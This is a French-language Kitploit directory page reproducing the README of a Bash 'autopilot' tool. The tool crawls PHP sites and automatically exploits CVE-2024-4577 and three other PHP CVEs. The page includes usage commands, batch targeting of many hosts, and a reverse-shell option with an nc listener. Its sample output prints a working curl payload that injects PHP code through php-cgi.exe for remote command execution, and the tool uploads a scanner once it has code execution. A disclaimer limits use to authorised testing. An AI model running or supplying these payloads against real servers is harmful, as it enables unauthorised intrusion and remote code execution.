Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PHP_8.1.x_Exploit — Détection automatisée & exploitation de vulnérabilités PHP critiques (CVE-2024-4577 contournement, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Outils/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleCrawlerOutil d'Accès à Distance
GitHubgl1tch0x1/php_8.1.x_exploit
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

PHP_8.1.x_Exploit

Détection automatisée & exploitation de vulnérabilités PHP critiques (CVE-2024-4577 contournement, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Voir le dépôt
Partager

🚀 PHP CVE Autopilot

Détection et exploitation automatisées des vulnérabilités PHP critiques (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh est un outil d'évaluation de sécurité monofichier, sans configuration, qui découvre automatiquement les points de terminaison PHP vulnérables et exploite quatre CVE à fort impact affectant les versions de PHP antérieures à 8.1.34 (publié en décembre 2024). Il ne nécessite aucune conception manuelle de charge utile – fournissez simplement une URL et le script fait le reste, du crawling à l'exécution de code à distance. Entièrement autopilote – détecte et exploite automatiquement sans intervention de l'utilisateur.

Fonctionnalités

  • Autopilote entièrement autonome – à partir d'une seule URL, il crawl, identifie, teste et exploite sans interaction utilisateur.
  • Analyse par lots – fournissez une liste de cibles et exécutez en parallèle.
  • Crawling avancé – extrait les liens et les formulaires de la page d'accueil pour une meilleure découverte.
  • Identification de l'OS et de la version PHP – évite les attaques Windows uniquement sur Linux, vérifie la version PHP.
  • Contournement CVE-2024-4577 (injection d'arguments CGI Windows)
    • Détecte et exploite les points de terminaison PHP-CGI vulnérables.
    • Option reverse shell (one-liner PowerShell).
Télécharger l’outil
  • Deux variantes d'injection : standard -d et contournement par trait d'union doux %AD.
  • CVE-2025-14177 – fuite de mémoire tas via getimagesize()
    • Crée dynamiquement un JPEG malformé et le soumet automatiquement à tout point de terminaison de téléchargement découvert.
    • Détecte la mémoire divulguée dans les réponses.
  • Analyse locale approfondie via RCE (lorsque CVE-2024-4577 est exploitée)
    • Télécharge un scanner PHP léger qui teste :
      • CVE-2025-14180 – déréférencement de pointeur NULL dans PDO PostgreSQL.
      • CVE-2025-14178 – débordement d'entier dans array_merge.
  • Crawling intelligent – extrait les liens et les formulaires pour découvrir les scripts CGI et les pages de téléchargement.
  • Exécution parallèle – utilise parallel si disponible, sinon bascule gracieusement.
  • Modes verbeux et débogage – voyez chaque requête HTTP et chaque décision.
  • Génération de rapport – enregistre tous les résultats dans un fichier texte.
  • Propre et sûr – les fichiers temporaires sont détruits à la sortie, les timeouts empêchent le blocage.
  • Prérequis

    DépendanceObjectifGénéralement installé ?
    bash 4.0+Interpréteur de scriptOui (Linux/macOS)
    curlRequêtes HTTPOui
    grep, sed, awkTraitement de texteOui
    mktempCréation de fichier temporaireOui
    (optionnel) parallelAnalyse par lots plus rapideNon (mais recommandé)
    (optionnel) jqFormatage de sortie JSONNon

    Aucun privilège root requis – l'outil envoie uniquement des requêtes HTTP et exécute éventuellement un reverse shell (nécessite un écouteur sur votre machine).

    Installation

    root@kitploit:~
    git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
    cd PHP_8.1.x_Exploit
    chmod +x PHP8.1.x_Exploit.sh
    

    Utilisation

    Cible unique (cas le plus courant)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://cible.example.com
    

    Cible unique avec reverse shell (CVE-2024-4577)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://serveur-windows-vulnerable.local/ --revshell 192.168.1.100 4444
    

    Puis sur votre machine :

    root@kitploit:~
    nc -lvnp 4444
    

    Analyse par lots de plusieurs cibles

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -l cibles.txt --threads 10
    

    Exemple cibles.txt :

    root@kitploit:~
    http://192.168.1.1/
    https://10.0.0.5:8080/
    http://app-interne.entreprise.com
    

    Mode analyse uniquement (pas de tentative d'exploitation)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://cible.com/ --scan-only
    

    Enregistrer le rapport dans un fichier

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://cible.com/ -o resultats.txt
    

    Sortie verbeuse / débogage

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://cible.com/ --verbose
    ./PHP8.1.x_Exploit.sh -u http://cible.com/ --debug   # très bavard
    

    Comment ça fonctionne (phases)

    PhaseAction
    1Identification – OS et version PHP à partir des en-têtes et sondes.
    2Crawling – extrait les attributs href et action de la page d'accueil.
    3Découverte CGI – essaie les chemins courants et les liens crawlés qui ressemblent à du CGI.
    4Test CVE‑2024‑4577 – injecte les charges utiles -d et %AD ; en cas de succès, exécute des commandes ou envoie un reverse shell.
    5Découverte de point de terminaison de téléchargement – vérifie les chemins de téléchargement courants et tout formulaire contenant "upload"/"image".
    6Test CVE‑2025‑14177 – crée un JPEG malformé, le POST sur chaque point de terminaison de téléchargement, détecte les fuites tas.
    7Analyse interne approfondie – si une RCE est obtenue, télécharge un script PHP scanner et l'exécute pour tester CVE‑2025‑14180 / CVE‑2025‑14178.
    8Rapport – affiche un résumé et écrit éventuellement dans un fichier.

    Options de ligne de commande (référence complète)

    OptionDescription
    -u URLURL de la cible unique (ex. http://example.com/)
    -l FICHIERFichier par lots avec une URL par ligne
    --scan-onlyDétecter uniquement – ne pas exploiter (pas de reverse shell, pas de téléchargement de charge utile)
    -o FICHIERÉcrire le rapport final dans FICHIER
    --threads NNombre de threads parallèles pour l'analyse par lots (défaut : 5)
    --timeout NTimeout HTTP en secondes (défaut : 10)
    --no-colorDésactiver la sortie colorée
    --verboseAfficher la progression détaillée
    --debugAfficher chaque requête HTTP (peut exposer des données sensibles)
    --revshell IP PORTTenter un reverse shell lorsque CVE‑2024‑4577 est trouvée
    -h, --helpAfficher l'aide et quitter

    CVE couvertes en détail

    CVESévéritéImpactVecteur d'exploitationCorrigé dans
    CVE‑2024‑4577 (bypass)CritiqueRCEInjection d'arguments CGI Windows (mappage trait d'union doux)PHP 8.1.34
    CVE‑2025‑14177Moyen/ÉlevéFuite d'informations (mémoire tas)JPEG malformé passé à getimagesize()PHP 8.1.34
    CVE‑2025‑14180ÉlevéDoS (déréférencement NULL)PDO PostgreSQL avec prepares émulés + paramètre malformé \x99PHP 8.1.34
    CVE‑2025‑14178Élevé (8.2)DoS / corruption mémoire potentiellearray_merge() avec de grands tableaux provoquant un débordement d'entierPHP 8.1.34

    Remarque : CVE‑2025‑14180 et CVE‑2025‑14178 ne peuvent être détectées avec précision que depuis l'intérieur du serveur (tests locaux). Le script y parvient en téléchargeant un scanner après une exploitation CGI réussie.

    📸 Exemple de sortie

    root@kitploit:~
    [*] Scan de : http://192.168.1.100/
    [*] OS : windows
    [*] Version PHP : 8.1.33
    [*] Test de CVE-2024-4577 sur http://192.168.1.100/cgi-bin/php-cgi.exe
    [✓] CVE-2024-4577 : VULNÉRABLE (injection par trait d'union doux)
    [*] Tentative de reverse shell vers 192.168.1.5 4444
    ...
    [*] Test de CVE-2025-14177 via http://192.168.1.100/upload.php
    [-] CVE-2025-14177 : Fuite tas potentielle détectée !
    ...
    [*] Exécution d'un scan local approfondi via RCE...
    PHP_VERSION=8.1.33
    CVE-2025-14180 : VULNÉRABLE
    CVE-2025-14178 : VULNÉRABLE
    CVE-2025-14177 : VULNÉRABLE (fuite : 486561704c65616b21...)
    
    ===================== Rapport pour http://192.168.1.100/ =====================
    OS : windows
    PHP : 8.1.33
    CVE-2024-4577 : EXPLOITABLE sur http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
    PoC : curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
    CVE-2025-14177 : VULNÉRABLE
    CVE-2025-14180/14178 : VULNÉRABLE (voir sortie du scan approfondi)
    ==============================================================
    

    ⚠️ Avertissements importants et clause de non-responsabilité

    • Mode autopilote – L'outil exploite automatiquement les vulnérabilités sans invite. Utilisez-le uniquement sur des cibles autorisées.
    • Utilisation légale uniquement – Cet outil est destiné aux évaluations de sécurité autorisées, tests d'intrusion et fins éducatives. L'utiliser contre des systèmes sans autorisation est illégal dans la plupart des juridictions.
    • Aucune garantie – Le logiciel est fourni "TEL QUEL" sans garanties d'aucune sorte.
    • Risque de dommages – Les exploits peuvent faire planter des services (CVE-2025-14180) ou corrompre la mémoire (CVE-2025-14178). Ne pas exécuter sur des systèmes de production sans consentement explicite.
    • Reverse shell – L'option --revshell ouvre un socket de la cible vers votre machine. Assurez-vous d'avoir le droit de vous reconnecter.
    • Journalisation – Vos requêtes apparaîtront dans les journaux d'accès/erreurs de la cible. Utilisez de manière responsable.

    🛠️ Dépannage

    ProblèmeSolution
    curl: command not foundInstallez curl
    GNU parallel not foundIgnoré – le script fonctionne sans (analyses par lots plus lentes)
    Aucun point de terminaison CGI trouvéLa cible n'utilise peut-être pas CGI, ou est derrière un WAF qui bloque les drapeaux -d
    CVE-2024-4577 fonctionne mais le reverse shell échoueVérifiez le pare-feu ; essayez une charge utile plus simple avec --scan-only et un écouteur nc manuel
    Le test de fuite d'image retourne toujours "Pas de fuite"Le point de terminaison de téléchargement n'utilise peut-être pas getimagesize(), ou nettoie les données binaires
    Le téléchargement du scanner local échoueLa racine web n'est peut-être pas accessible en écriture ; le script tente d'écrire dans le même répertoire que le script CGI

    🤝 Contribuer

    Les pull requests, rapports de bogues et suggestions de fonctionnalités sont les bienvenus. Veuillez suivre :

    • Garder le script monofichier et pur Bash.
    • Tester avec et sans parallel.
    • Mettre à jour ce README en conséquence.

    📜 Licence

    GNU General Public License v3.0 – voir le fichier LICENSE.

    📚 Références

    • Annonce de version PHP 8.1.34
    • Détail CVE-2024-4577 (NVD)
    • CVE-2025-14177 / 14178 / 14180 (NVD)
    • Mappage de caractères Best-Fit Windows

    Fabriqué avec 🧠 pour la communauté de la sécurité. Utilisez de manière éthique.